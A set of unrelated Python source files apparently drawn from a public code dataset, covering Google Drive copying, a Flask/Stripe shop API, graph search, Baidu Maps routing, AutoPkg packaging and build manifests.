_LOGGER.error("Show '%s' not found in '%s'", show_name, library_name)
return None
if not season_number:
return show
try:
season = show.season(int(season_number))
except NotFound:
_LOGGER.error(
"Season %d of '%s' not found", season_number, show_name,
)
return None
if not episode_number:
return season
try:
return season.episode(episode=int(episode_number))
except NotFound:
_LOGGER.error(
"Episode not found: %s - S%sE%s",
show_name,
str(season_number).zfill(2),
str(episode_number).zfill(2),
)
return None
if media_type == MEDIA_TYPE_MUSIC:
return lookup_music()
if media_type == MEDIA_TYPE_EPISODE:
return lookup_tv()
if media_type == MEDIA_TYPE_VIDEO:
try:
video_name = kwargs["video_name"]
return library_section.get(video_name)
except KeyError:
_LOGGER.error("Must specify 'video_name' for this search")
except NotFound:
_LOGGER.error(
"Movie '%s' not found in '%s'", video_name, library_name,
)
|
the-stack_0_1604 | from __future__ import print_function
import datetime
import time
import httplib2
import os
import sys
from apiclient import discovery
import oauth2client
from oauth2client import client
from oauth2client import tools
from oauth2client import file
from logbook import Logger, FileHandler, StreamHandler
log = Logger('copy-google-drive-folder')
try:
import argparse
flags = argparse.ArgumentParser(parents=[tools.argparser])
# add in our specific command line requirements
flags.add_argument('--source-folder_id', '-f', type=str, required=True,
help="Source Google Drive Folder ID (it's the end of the folder URI!) (required)")
flags.add_argument('--target-folder_id', '-t', type=str, required=True,
help="Target Google Drive Folder ID (it's the end of the folder URI!) (required)")
flags.add_argument('--page-size', '-p', type=int, default=100,
help="Number of files in each page (defaults to 100)")
flags.add_argument('--start-page', '-s', type=int, default=1,
help="start from page N of the file listing (defaults to 1)")
flags.add_argument('--end-page', '-e', type=int, default=None,
help="stop paging at page N of the file listing (defaults to not stop before the end)")
flags.add_argument('--log-dir', '-l', type=str, help='Where to put log files', default='/tmp')
flags.add_argument('--log-level', type=str, help='Choose a log level', default='INFO')
args = flags.parse_args()
except ImportError:
flags = None
# If modifying these scopes, delete your previously saved credentials
# at ~/.credentials/drive-python-quickstart.json
# SCOPES = 'https://www.googleapis.com/auth/drive.metadata.readonly'
SCOPES = 'https://www.googleapis.com/auth/drive'
CLIENT_SECRET_FILE = 'client_secret.json'
APPLICATION_NAME = 'Copy Google Drive Folders'
def get_credentials():
"""Gets valid user credentials from storage.
If nothing has been stored, or if the stored credentials are invalid,
the OAuth2 flow is completed to obtain the new credentials.
Returns:
Credentials, the obtained credential.
"""
home_dir = os.path.expanduser('~')
credential_dir = os.path.join(home_dir, '.credentials')
if not os.path.exists(credential_dir):
os.makedirs(credential_dir)
credential_path = os.path.join(credential_dir,
'drive-copy-google-folders.json')
store = oauth2client.file.Storage(credential_path)
credentials = store.get()
if not credentials or credentials.invalid:
flow = client.flow_from_clientsecrets(CLIENT_SECRET_FILE, SCOPES)
flow.user_agent = APPLICATION_NAME
if flags:
credentials = tools.run_flow(flow, store, args)
else: # Needed only for compatibility with Python 2.6
credentials = tools.run(flow, store)
log.info('Storing credentials to ' + credential_path)
return credentials
def ensure_trailing_slash(val):
if val[-1] != '/':
return "{}/".format(val)
return val
def main():
"""
Copy a folder from Source to Target
"""
log_filename = os.path.join(
args.log_dir,
'copy-google-drive-folder-{}.log'.format(os.path.basename(time.strftime('%Y%m%d-%H%M%S')))
)
# register some logging handlers
log_handler = FileHandler(
log_filename,
mode='w',
level=args.log_level,
bubble=True
)
stdout_handler = StreamHandler(sys.stdout, level=args.log_level, bubble=True)
with stdout_handler.applicationbound():
with log_handler.applicationbound():
log.info("Arguments: {}".format(args))
start = time.time()
log.info("starting at {}".format(time.strftime('%l:%M%p %Z on %b %d, %Y')))
credentials = get_credentials()
http = credentials.authorize(httplib2.Http())
drive_service = discovery.build('drive', 'v3', http=http)
# get the files in the specified folder.
files = drive_service.files()
request = files.list(
pageSize=args.page_size,
q="'{}' in parents".format(args.source_folder_id),
fields="nextPageToken, files(id, name, mimeType)"
)
page_counter = 0
file_counter = 0
while request is not None:
file_page = request.execute(http=http)
page_counter += 1
page_file_counter = 0 # reset the paging file counter
# determine the page at which to start processing.
if page_counter >= args.start_page:
log.info(u"######## Page {} ########".format(page_counter))
for this_file in file_page['files']:
file_counter += 1
page_file_counter += 1
log.info(u"#== Processing {} {} file number {} on page {}. {} files processed.".format(
this_file['mimeType'],
this_file['name'],
page_file_counter,
page_counter,
file_counter
))
# if not a folder
if this_file['mimeType'] != 'application/vnd.google-apps.folder':
# Copy the file
new_file = {'title': this_file['name']}
copied_file = drive_service.files().copy(fileId=this_file['id'], body=new_file).execute()
# move it to it's new location
drive_service.files().update(
fileId=copied_file['id'],
addParents=args.target_folder_id,
removeParents=args.source_folder_id
).execute()
else:
log.info(u"Skipped Folder")
else:
log.info(u"Skipping Page {}".format(page_counter))
# stop if we have come to the last user specified page
if args.end_page and page_counter == args.end_page:
log.info(u"Finished paging at page {}".format(page_counter))
break
# request the next page of files
request = files.list_next(request, file_page)
log.info("Running time: {}".format(str(datetime.timedelta(seconds=(round(time.time() - start, 3))))))
log.info("Log written to {}:".format(log_filename))
if __name__ == '__main__':
main()
|
the-stack_0_1606 | """Base class for task type models."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import json
import dateutil.parser
from saltant.constants import HTTP_200_OK, HTTP_201_CREATED
from .resource import Model, ModelManager
class BaseTaskType(Model):
"""Base model for a task type.
Attributes:
id (int): The ID of the task type.
name (str): The name of the task type.
description (str): The description of the task type.
user (str): The user associated with the task type.
datetime_created (:class:`datetime.datetime`): The datetime when
the task type was created.
command_to_run (str): The command to run to execute the task.
environment_variables (list): The environment variables required
on the host to execute the task.
required_arguments (list): The argument names for the task type.
required_arguments_default_values (dict): Default values for the
task's required arguments.
manager (:class:`saltant.models.base_task_type.BaseTaskTypeManager`):
The task type manager which spawned this task type.
"""
def __init__(
self,
id,
name,
description,
user,
datetime_created,
command_to_run,
environment_variables,
required_arguments,
required_arguments_default_values,
manager,
):
"""Initialize a task type.
Args:
id (int): The ID of the task type.
name (str): The name of the task type.
description (str): The description of the task type.
user (str): The user associated with the task type.
datetime_created (:class:`datetime.datetime`): The datetime
when the task type was created.
command_to_run (str): The command to run to execute the task.
environment_variables (list): The environment variables
required on the host to execute the task.
required_arguments (list): The argument names for the task type.
required_arguments_default_values (dict): Default values for
the tasks required arguments.
manager (:class:`saltant.models.base_task_type.BaseTaskTypeManager`):
The task type manager which spawned this task type.
"""
# Call parent constructor
super(BaseTaskType, self).__init__(manager)
self.id = id
self.name = name
self.description = description
self.user = user
self.datetime_created = datetime_created
self.command_to_run = command_to_run
self.environment_variables = environment_variables
self.required_arguments = required_arguments
self.required_arguments_default_values = (
required_arguments_default_values
)
def __str__(self):
"""String representation of the task type."""
return "%s (%s)" % (self.name, self.user)
def sync(self):
"""Sync this model with latest data on the saltant server.
Note that in addition to returning the updated object, it also
updates the existing object.
Returns:
:class:`saltant.models.base_task_type.BaseTaskType`:
This task type instance after syncing.
"""
self = self.manager.get(id=self.id)
return self
def put(self):
"""Updates this task type on the saltant server.
Returns:
:class:`saltant.models.base_task_type.BaseTaskType`:
A task type model instance representing the task type
just updated.
"""
return self.manager.put(
id=self.id,
name=self.name,
description=self.description,
command_to_run=self.command_to_run,
environment_variables=self.environment_variables,
required_arguments=self.required_arguments,
required_arguments_default_values=(
self.required_arguments_default_values
),
)
class BaseTaskTypeManager(ModelManager):
"""Base manager for task types.
Attributes:
_client (:class:`saltant.client.Client`): An authenticated
saltant client.
list_url (str): The URL to list task types.
detail_url (str): The URL format to get specific task types.
model (:class:`saltant.models.resource.Model`): The model of the
task type being used.
"""
model = BaseTaskType
def get(self, id=None, name=None):
"""Get a task type.
Either the id xor the name of the task type must be specified.
Args:
id (int, optional): The id of the task type to get.
name (str, optional): The name of the task type to get.
Returns:
:class:`saltant.models.base_task_type.BaseTaskType`:
A task type model instance representing the task type
requested.
Raises:
ValueError: Neither id nor name were set *or* both id and
name were set.
"""
# Validate arguments - use an xor
if not ((id is None) ^ (name is None)):
raise ValueError("Either id or name must be set (but not both!)")
# If it's just ID provided, call the parent function
if id is not None:
return super(BaseTaskTypeManager, self).get(id=id)
# Try getting the task type by name
return self.list(filters={"name": name})[0]
def create(
self,
name,
command_to_run,
description="",
environment_variables=None,
required_arguments=None,
required_arguments_default_values=None,
extra_data_to_post=None,
):
"""Create a task type.
Args:
name (str): The name of the task.
command_to_run (str): The command to run to execute the task.
description (str, optional): The description of the task type.
environment_variables (list, optional): The environment
variables required on the host to execute the task.
required_arguments (list, optional): The argument names for
the task type.
required_arguments_default_values (dict, optional): Default
values for the tasks required arguments.
extra_data_to_post (dict, optional): Extra key-value pairs
to add to the request data. This is useful for
subclasses which require extra parameters.
Returns:
:class:`saltant.models.base_task_instance.BaseTaskType`:
A task type model instance representing the task type
just created.
"""
# Set None for optional list and dicts to proper datatypes
if environment_variables is None:
environment_variables = []
if required_arguments is None:
required_arguments = []
if required_arguments_default_values is None:
required_arguments_default_values = {}
# Create the object
request_url = self._client.base_api_url + self.list_url
data_to_post = {
"name": name,
"description": description,
"command_to_run": command_to_run,
"environment_variables": json.dumps(environment_variables),
"required_arguments": json.dumps(required_arguments),
"required_arguments_default_values": json.dumps(
required_arguments_default_values
),
}
# Add in extra data if any was passed in
if extra_data_to_post is not None:
data_to_post.update(extra_data_to_post)
response = self._client.session.post(request_url, data=data_to_post)
# Validate that the request was successful
self.validate_request_success(
response_text=response.text,
request_url=request_url,
status_code=response.status_code,
expected_status_code=HTTP_201_CREATED,
)
# Return a model instance representing the task type
return self.response_data_to_model_instance(response.json())
def put(
self,
id,
name,
description,
command_to_run,
environment_variables,
required_arguments,
required_arguments_default_values,
extra_data_to_put=None,
):
"""Updates a task type on the saltant server.
Args:
id (int): The ID of the task type.
name (str): The name of the task type.
description (str): The description of the task type.
command_to_run (str): The command to run to execute the task.
environment_variables (list): The environment variables
required on the host to execute the task.
required_arguments (list): The argument names for the task type.
required_arguments_default_values (dict): Default values for
the tasks required arguments.
extra_data_to_put (dict, optional): Extra key-value pairs to
add to the request data. This is useful for subclasses
which require extra parameters.
Returns:
:class:`saltant.models.base_task_type.BaseTaskType`:
A :class:`saltant.models.base_task_type.BaseTaskType`
subclass instance representing the task type just
updated.
"""
# Update the object
request_url = self._client.base_api_url + self.detail_url.format(id=id)
data_to_put = {
"name": name,
"description": description,
"command_to_run": command_to_run,
"environment_variables": json.dumps(environment_variables),
"required_arguments": json.dumps(required_arguments),
"required_arguments_default_values": json.dumps(
required_arguments_default_values
),
}
# Add in extra data if any was passed in
if extra_data_to_put is not None:
data_to_put.update(extra_data_to_put)
response = self._client.session.put(request_url, data=data_to_put)
# Validate that the request was successful
self.validate_request_success(
response_text=response.text,
request_url=request_url,
status_code=response.status_code,
expected_status_code=HTTP_200_OK,
)
# Return a model instance representing the task instance
return self.response_data_to_model_instance(response.json())
def response_data_to_model_instance(self, response_data):
"""Convert response data to a task type model.
Args:
response_data (dict): The data from the request's response.
Returns:
:class:`saltant.models.base_task_type.BaseTaskType`:
A model instance representing the task type from the
reponse data.
"""
# Coerce datetime strings into datetime objects
response_data["datetime_created"] = dateutil.parser.parse(
response_data["datetime_created"]
)
# Instantiate a model for the task instance
return super(
BaseTaskTypeManager, self
).response_data_to_model_instance(response_data)
|
the-stack_0_1607 | # -*- coding: utf-8 -*-
'''
这是一个计算origins到targets的自驾行车OD矩阵的exmaple,同时这里会将解析出来的数据存在本地
'''
import pandas as pd
import json
import os
from BaiduMapAPI.api import SearchPlace, MapDirection
AK = os.environ["BaiduAK"]
SK = os.environ["BaiduSK"]
origins_data = pd.read_csv("data/exmaple_citydata_coords.csv", encoding="utf-8")
targets_name = {
"香港":"香港国际机场", "广州": "广州白云国际机场", "深圳":"深圳宝安国际机场",
"珠海":"珠海金湾国际机场", "澳门":"澳门国际机场", "佛山":"佛山沙堤机场",
"惠州":"惠州平潭机场"
}
place = SearchPlace(AK, SK)
dirction = MapDirection(AK, SK)
fw = open("driving_result.csv", "w", encoding="utf-8")
fw.write("origin, target, distance, duration, toll \n")
for name in targets_name:
pois = place.search(targets_name[name], region=name)
poi = pois[0]
loc = poi.get_location()
for i in origins_data.index:
coords = (round(origins_data["lat"][i],5),round(origins_data["lng"][i],5))
print(coords)
content = dirction.driving(loc, coords)
content = json.loads(content)
origin = origins_data["详细地址"][i]
target = targets_name[name]
# 常规路线的距离和时间
if "result" in content:
driving_distance = content["result"]['routes'][0]["distance"]
driving_duration = content["result"]['routes'][0]["duration"]
toll = content["result"]['routes'][0]["toll"]
fw.write("%s, %s, %s, %s, %s \n"%(origin, target, driving_distance, driving_duration, toll))
fw.close() |
the-stack_0_1608 | """
Bidirectional search is a graph search algorithm that finds a shortest path from an initial vertex to a goal
vertex in a directed graph. It runs two simultaneous searches: one forward from the initial state
, and one backward from the goal, stopping when the two meet in the middle. [Wikipedia]
"""
import queue
def _visit(direction_queues, side, node, dist, length):
"""
Function for adding length of the path to the queueues
Args:
direction_queues: queues
side: which side needs to be processed (from tartget or from source)
node: node itself
dist: distances array
length: lenght of the path
"""
if node not in dist[side] or dist[side][node] > length:
dist[side][node] = length
direction_queues[side].put((length, node))
def bidi_dijkstra(graph, start, target):
"""
Calculate shortest path via Dijkstra algorithm, with bidirectional optimization
which means that we start from target and start points and swith between them each step
Args:
graph: graph representation
start: start node
target: target node
Returns:
int: lengths of the shortest path between start and target nodes
Examples:
>>> graph = prepare_weighted_undirect_graph(
[(1, 2, 7), (1, 3, 9), (1, 6, 14), (6, 3, 2), (6, 5, 9), (3, 2, 10), (3, 4, 11),
(2, 4, 15), (6, 5, 9), (5, 4, 6)])
>>> dijkstra(graph, 1, 6)
11
"""
dist = [dict(), dict()]
visits = [set(), set()]
direction_queues = [queue.PriorityQueue(), queue.PriorityQueue()]
_visit(direction_queues, 0, start, dist, 0)
_visit(direction_queues, 1, target, dist, 0)
nodes_process = [[], []]
flip_side = 0
while not direction_queues[0].empty() or not direction_queues[1].empty():
node = direction_queues[flip_side].get()[1]
for adjacent_node, edge_weigth in graph[node].items():
length = dist[flip_side][node] + edge_weigth
_visit(direction_queues, flip_side, adjacent_node, dist, length)
nodes_process[flip_side].append(node)
visits[flip_side].add(node)
if node in visits[flip_side ^ 1]:
return _calc_shortest_path(nodes_process, dist)
if not direction_queues[flip_side ^ 1].empty():
flip_side ^= 1
return -1
def _calc_shortest_path(nodes_process, dist):
"""
Calculate shortest path
Args:
nodes_process: nodes that we met on path
dist: distances
Returns:
int: length shortest path
"""
shortest_path = 10 ** 16
for node in nodes_process[1] + nodes_process[0]:
if node in dist[0] and node in dist[1] and dist[0][node] + dist[1][node] < shortest_path:
shortest_path = dist[0][node] + dist[1][node]
return shortest_path
|
the-stack_0_1609 | import os
import sys
import stripe
import datetime
from flask import *
#import cloudinary as Cloud
#import cloudinary.uploader
from Backend.models import *
from Backend import db, bcrypt
from Backend.config import Config
from flask_cors import cross_origin
from Backend.ext import token_required
from Backend.registration.decorator import check_confirmed
from itsdangerous import TimedJSONWebSignatureSerializer as Serializer
auth = Blueprint('authorization', __name__)
stripe_keys = {
'secret_key': "sk_test_51IscUOBuSPNXczcenT31xOR1QnW6T2kPpfr0N3JKHvY7Idqb4oQUiOK245Azeac3VgUiN8nNT88vNf2VTkLIVebK00ZeQX3fm7",
'publishable_key': 'pk_test_51IscUOBuSPNXczceSfoIKAm7bARLi4fS9QZr5SNVOMa3aF7zlmIwmarG0fnc2ijpkn1WrVnrs9obt9zCTPihKiBe00tVxBVhKf',
}
stripe.api_key = stripe_keys['secret_key']
Message= "Problem uploading to server... if error persists, send message to [email protected] to lay complaint"
try:
PYTHON_VERSION = sys.version_info[0]
if PYTHON_VERSION == 3:
import urllib.request
resource = urllib.request.urlopen('https://api.ipregistry.co/?key=0umiu3uyv8174l')
else:
import urlparse
resource = urlparse.urlopen('https://api.ipregistry.co/?key=0umiu3uyv8174l')
payload = resource.read().decode('utf-8')
location = json.loads(payload)['location']['country']['name']
country= str(location).lower()
except:
pass
@auth.route('/config')
def get_publishable_key():
stripe_config = {'publicKey': stripe_keys['publishable_key']}
return jsonify(stripe_config)
@auth.route('/api/book/product/<int:product_id>', methods=['POST'])
@cross_origin()
@token_required
@check_confirmed
def bookProduct(current_user, product_id):
product = Product.query.filter_by(id= product_id).first()
if country not in product.available_in:
return jsonify({
"message": "Product not available in your region"
})
booked = Store.query.filter_by(saved=current_user).first()
already_booked = Store.query.filter_by(saved=current_user).filter_by(stored_data=product.product_name).first()
if already_booked:
return jsonify({
"message": "Product already booked by you"
})
if not booked:
booked = Store(saved=current_user)
booked.stored_data = product.product_name
db.session.add(booked)
booked.stored_data = product.product_name
if not product:
return jsonify({
"message": "Product not found"
})
try:
product.sold = True
db.session.commit()
return jsonify({
"message": "Product has been booked"
})
except:
return jsonify({
"message": "Problem with our server... Try again"
}), 500
@auth.route('/api/my/booked')
@cross_origin()
@token_required
@check_confirmed
def myBooked(current_user):
store = Store.query.filter_by(saved=current_user).all()
data = []
for product_id in store:
products = Product.query.filter_by(product_name=product_id.stored_data).filter(Product.sold == True).all()
for product in products:
data.append({
'name': product.product_name,
'description': product.description,
"category": product.category,
"price": product.product_price,
"varieties": product.varieties,
"expires": product.expiry_date,
"rate": product.rate
})
return jsonify({
"data": data,
}), 200
@auth.route('/api/checkout/product', methods=['POST'])
@cross_origin()
def checkoutProduct():
data = request.get_json()
product = Product.query.filter_by(product_name = data['name']).first()
if not product :
return jsonify({
"message": "Product not available at the moment"
})
if country not in product.available_in:
return jsonify({
"message": "Product not available in your region"
})
elif product.sold == True:
return jsonify({
"message": "Product currently unavailable"
})
intent = stripe.PaymentIntent.create(
amount=product.product_price,
currency=product.currency
)
try:
return jsonify({
'clientSecret': intent['client_secret']
})
except Exception as e:
return jsonify(error=str(e)), 403
@auth.route('/api/add/to/cart/<int:product_id>', methods=['POST'])
@cross_origin()
@token_required
@check_confirmed
def addToCart(current_user, product_id):
product = Product.query.filter_by(id= product_id).first()
if not product:
return jsonify({
"message": "Product is not available at the moment"
})
if country not in product.available_in:
return jsonify({
"message": "Product not available in your region"
})
cart = Store.query.filter_by(saved=current_user).first()
already_booked = Store.query.filter_by(saved=current_user).filter_by(stored_data=product.product_name).first()
if already_booked:
return jsonify({
"message": "Product already in your cart"
})
try:
if not cart:
cart = Store(saved=current_user)
cart.stored_data = product.product_name
db.session.add(cart)
cart.stored_data = product.product_name
db.session.commit()
return jsonify({
"message": "Product successfully add to cart"
})
except:
return jsonify({
"message": Message
})
@auth.route('/api/my/cart')
@cross_origin()
@token_required
@check_confirmed
def myStore(current_user):
store = Store.query.filter_by(saved=current_user).all()
data = []
for product_id in store:
products = Product.query.filter_by(product_name=product_id.stored_data).all()
for product in products:
data.append({'name': product.product_name,
'description': product.description,
"category": product.category,
"price": product.product_price,
"varieties": product.varieties,
"expires": product.expiry_date,
"rate": product.rate,
"currency": product.currency
})
return jsonify({
"data": data,
}), 200
@auth.route('/api/remove/from/cart/<int:product_id>', methods=['POST'])
@cross_origin()
@token_required
@check_confirmed
def removeFromCart(current_user, product_id):
product = Product.query.filter_by(id= product_id).first()
if not product:
return jsonify({
"message": "Product is not available at the moment"
})
store = Store.query.filter_by(saved=current_user).filter_by(stored_data=product.product_name).first()
if not store:
return jsonify({
"message": "product not in your cart"
})
try:
db.session.delete(store)
db.session.commit()
return jsonify({
"message": "Product successfully removed from cart"
})
except:
return jsonify({
"message": Message
})
@auth.route('/api/rate/product/<int:product_id>', methods=['POST'])
@cross_origin()
def rate(product_id):
data = request.get_json()
product = Product.query.filter_by(id= product_id).first()
if not product:
return jsonify({
"message": "product not available"
})
try:
product.rate =product.rate + int(data['rate'])
db.session.commit()
return jsonify({
"message": "Product has been rated"
})
except:
return jsonify({
"message": Message
})
@auth.route('/api/add/comment/product/<int:product_id>', methods=['POST'])
@cross_origin()
@token_required
@check_confirmed
def addComment(current_user, product_id):
data = request.get_json()
product = Product.query.filter_by(id= product_id).first()
if not product:
return jsonify({
"message": "product not available"
})
try:
comment = Comment(thought=product)
comment.post = data['post']
db.session.add(comment)
db.session.commit()
return jsonify({
"message": "Comment on product has been posted "
})
except:
return jsonify({
"message": Message
})
@auth.route('/api/comments/product/<int:product_id>')
@cross_origin()
def comments(product_id):
product = Product.query.filter_by(id= product_id).first()
comment = Comment.query.filter_by(thought=product).all()
comment_schema = CommentSchema(many=True)
result = comment_schema.dump(comment)
return jsonify({
"data": result
}), 200
|
the-stack_0_1612 | # coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
#
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
# --------------------------------------------------------------------------
from msrest import Configuration
from .version import VERSION
class LUISAuthoringClientConfiguration(Configuration):
"""Configuration for LUISAuthoringClient
Note that all parameters used to create this instance are saved as instance
attributes.
:param endpoint: Supported Cognitive Services endpoints (protocol and
hostname, for example: https://westus.api.cognitive.microsoft.com).
:type endpoint: str
:param credentials: Subscription credentials which uniquely identify
client subscription.
:type credentials: None
"""
def __init__(
self, endpoint, credentials):
if endpoint is None:
raise ValueError("Parameter 'endpoint' must not be None.")
if credentials is None:
raise ValueError("Parameter 'credentials' must not be None.")
base_url = '{Endpoint}/luis/authoring/v3.0-preview'
super(LUISAuthoringClientConfiguration, self).__init__(base_url)
# Starting Autorest.Python 4.0.64, make connection pool activated by default
self.keep_alive = True
self.add_user_agent('azure-cognitiveservices-language-luis/{}'.format(VERSION))
self.endpoint = endpoint
self.credentials = credentials
|
the-stack_0_1614 | #!/usr/bin/env python
#
# Copyright 2010 Per Olofsson
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os.path
import subprocess
import FoundationPlist
import math
from xml.etree import ElementTree
from autopkglib import Processor, ProcessorError
__all__ = ["PkgInfoCreator"]
class PkgInfoCreator(Processor):
description = "Creates an Info.plist file for a package."
input_variables = {
"template_path": {
"required": True,
"description": "An Info.plist template.",
},
"version": {
"required": True,
"description": "Version of the package.",
},
"pkgroot": {
"required": True,
"description": "Virtual root of the package.",
},
"infofile": {
"required": True,
"description": "Path to the info file to create.",
},
"pkgtype": {
"required": True,
"description": "'flat' or 'bundle'."
}
}
output_variables = {
}
__doc__ = description
def find_template(self):
'''Searches for the template, looking in the recipe directory
and parent recipe directories if needed.'''
template_path = self.env['template_path']
if os.path.exists(template_path):
return template_path
elif not template_path.startswith("/"):
recipe_dir = self.env.get('RECIPE_DIR')
search_dirs = [recipe_dir]
if self.env.get("PARENT_RECIPES"):
# also look in the directories containing the parent recipes
parent_recipe_dirs = list(set([
os.path.dirname(item)
for item in self.env["PARENT_RECIPES"]]))
search_dirs.extend(parent_recipe_dirs)
for directory in search_dirs:
test_item = os.path.join(directory, template_path)
if os.path.exists(test_item):
return test_item
raise ProcessorError("Can't find %s" % template_path)
def main(self):
if self.env['pkgtype'] not in ("bundle", "flat"):
raise ProcessorError("Unknown pkgtype %s" % self.env['pkgtype'])
template = self.load_template(self.find_template(), self.env['pkgtype'])
if self.env['pkgtype'] == "bundle":
self.create_bundle_info(template)
else:
self.create_flat_info(template)
restartaction_to_postinstallaction = {
"None": "none",
"RecommendRestart": "restart",
"RequireLogout": "logout",
"RequireRestart": "restart",
"RequireShutdown": "shutdown",
}
def convert_bundle_info_to_flat(self, info):
pkg_info = ElementTree.Element("pkg-info")
pkg_info.set("format-version", "2")
for bundle, flat in (("IFPkgFlagDefaultLocation", "install-location"),
("CFBundleShortVersionString", "version"),
("CFBundleIdentifier", "identifier")):
if bundle in info:
pkg_info.set(flat, info[bundle])
if "IFPkgFlagAuthorizationAction" in info:
if info["IFPkgFlagAuthorizationAction"] == "RootAuthorization":
pkg_info.set("auth", "root")
else:
pkg_info.set("auth", "none")
if "IFPkgFlagRestartAction" in info:
pkg_info.set("postinstall-action",
self.restartaction_to_postinstallaction[info["IFPkgFlagRestartAction"]])
payload = ElementTree.SubElement(pkg_info, "payload")
if "IFPkgFlagInstalledSize" in info:
payload.set("installKBytes", str(info["IFPkgFlagInstalledSize"]))
return ElementTree.ElementTree(pkg_info)
postinstallaction_to_restartaction = {
"none": "None",
"logout": "RequireLogout",
"restart": "RequireRestart",
"shutdown": "RequireShutdown",
}
def convert_flat_info_to_bundle(self, info):
info = {
#"CFBundleIdentifier": "com.adobe.pkg.FlashPlayer",
"IFPkgFlagAllowBackRev": False,
#"IFPkgFlagAuthorizationAction": "RootAuthorization",
#"IFPkgFlagDefaultLocation": "/",
"IFPkgFlagFollowLinks": True,
"IFPkgFlagInstallFat": False,
"IFPkgFlagIsRequired": False,
"IFPkgFlagOverwritePermissions": False,
"IFPkgFlagRelocatable": False,
#"IFPkgFlagRestartAction": "None",
"IFPkgFlagRootVolumeOnly": False,
"IFPkgFlagUpdateInstalledLanguages": False,
"IFPkgFormatVersion": 0.1,
}
pkg_info = info.getroot()
if pkg_info.tag != "pkg-info":
raise ProcessorError("PackageInfo template root isn't pkg-info")
info["CFBundleShortVersionString"] = pkg_info.get("version", "")
info["CFBundleIdentifier"] = pkg_info.get("identifier", "")
info["IFPkgFlagDefaultLocation"] = pkg_info.get("install-location", "")
if pkg_info.get("auth") == "root":
info["IFPkgFlagAuthorizationAction"] = "RootAuthorization"
else:
raise ProcessorError("Don't know how to convert auth=%s to Info.plist format" % pkg_info.get("auth"))
info["IFPkgFlagRestartAction"] = \
self.postinstallaction_to_restartaction[pkg_info.get("postinstall-action", "none")]
payload = ElementTree.SubElement(pkg_info, "payload")
info["IFPkgFlagInstalledSize"] = payload.get("installKBytes", 0)
return info
def load_template(self, template_path, template_type):
"""Load a package info template in Info.plist or PackageInfo format."""
if template_path.endswith(".plist"):
# Try to load Info.plist in bundle format.
try:
info = FoundationPlist.readPlist(self.env['template_path'])
except BaseException as e:
raise ProcessorError("Malformed Info.plist template %s" % self.env['template_path'])
if template_type == "bundle":
return info
else:
return self.convert_bundle_info_to_flat(info)
else:
# Try to load PackageInfo in flat format.
try:
info = ElementTree.parse(template_path)
except BaseException as e:
raise ProcessorError("Malformed PackageInfo template %s" % self.env['template_path'])
if template_type == "flat":
return info
else:
return self.convert_flat_info_to_bundle(info)
def get_pkgroot_size(self, pkgroot):
"""Return the size of pkgroot (in kilobytes) and the number of files."""
size = 0
nfiles = 0
for (dirpath, dirnames, filenames) in os.walk(pkgroot):
# Count the current directory and the number of files in it.
nfiles += 1 + len(filenames)
for filename in filenames:
path = os.path.join(dirpath, filename)
# Add up file size rounded up to the nearest 4 kB, which
# appears to match what du -sk returns, and what PackageMaker
# uses.
size += int(math.ceil(float(os.lstat(path).st_size) / 4096.0))
return (size, nfiles)
def create_flat_info(self, template):
info = template
pkg_info = info.getroot()
if pkg_info.tag != "pkg-info":
raise ProcessorError("PackageInfo root should be pkg-info")
pkg_info.set("version", self.env['version'])
payload = pkg_info.find("payload")
if payload is None:
payload = ElementTree.SubElement(pkg_info, "payload")
size, nfiles = self.get_pkgroot_size(self.env['pkgroot'])
payload.set("installKBytes", str(size))
payload.set("numberOfFiles", str(nfiles))
info.write(self.env['infofile'])
def create_bundle_info(self, template):
info = template
info["CFBundleShortVersionString"] = self.env['version']
ver = self.env['version'].split(".")
info["IFMajorVersion"] = ver[0]
info["IFMinorVersion"] = ver[1]
size, nfiles = self.get_pkgroot_size(self.env['pkgroot'])
info["IFPkgFlagInstalledSize"] = size
try:
FoundationPlist.writePlist(info, self.env['infofile'])
except BaseException as e:
raise ProcessorError("Couldn't write %s: %s" % (self.env['infofile'], e))
if __name__ == '__main__':
processor = PkgInfoCreator()
processor.execute_shell()
|
the-stack_0_1615 | # SPDX-License-Identifier: Apache-2.0
#
# The OpenSearch Contributors require contributions made to
# this file be licensed under the Apache-2.0 license or a
# compatible open source license.
from typing import Any
from manifests.component_manifest import ComponentManifest, Components, Component
"""
A BuildManifest is an immutable view of the outputs from a build step
The manifest contains information about the product that was built (in the `build` section),
and the components that made up the build in the `components` section.
The format for schema version 1.0 is:
schema-version: "1.0"
build:
name: string
version: string
architecture: x64 or arm64
components:
- name: string
repository: URL of git repository
ref: git ref that was built (sha, branch, or tag)
commit_id: The actual git commit ID that was built (i.e. the resolved "ref")
artifacts:
maven:
- maven/relative/path/to/artifact
- ...
plugins:
- plugins/relative/path/to/artifact
- ...
libs:
- libs/relative/path/to/artifact
- ...
- ...
"""
class BuildManifest_1_0(ComponentManifest['BuildManifest_1_0', 'BuildComponents_1_0']):
SCHEMA = {
"build": {
"required": True,
"type": "dict",
"schema": {
"architecture": {"required": True, "type": "string"},
"id": {"required": True, "type": "string"},
"name": {"required": True, "type": "string"},
"version": {"required": True, "type": "string"},
},
},
"schema-version": {"required": True, "type": "string", "allowed": ["1.0"]},
"components": {
"type": "list",
"schema": {
"type": "dict",
"schema": {
"artifacts": {
"type": "dict",
"schema": {
"maven": {"type": "list"},
"plugins": {"type": "list"},
"bundle": {"type": "list"},
"core-plugins": {"type": "list"},
"libs": {"type": "list"},
},
},
"commit_id": {"required": True, "type": "string"},
"name": {"required": True, "type": "string"},
"ref": {"required": True, "type": "string"},
"repository": {"required": True, "type": "string"},
"version": {"required": True, "type": "string"},
},
},
},
}
def __init__(self, data: Any):
super().__init__(data)
self.build = self.Build(data["build"])
def __to_dict__(self) -> dict:
return {
"schema-version": "1.0",
"build": self.build.__to_dict__(),
"components": self.components.__to_dict__()
}
class Build:
def __init__(self, data: Any):
self.name = data["name"]
self.version = data["version"]
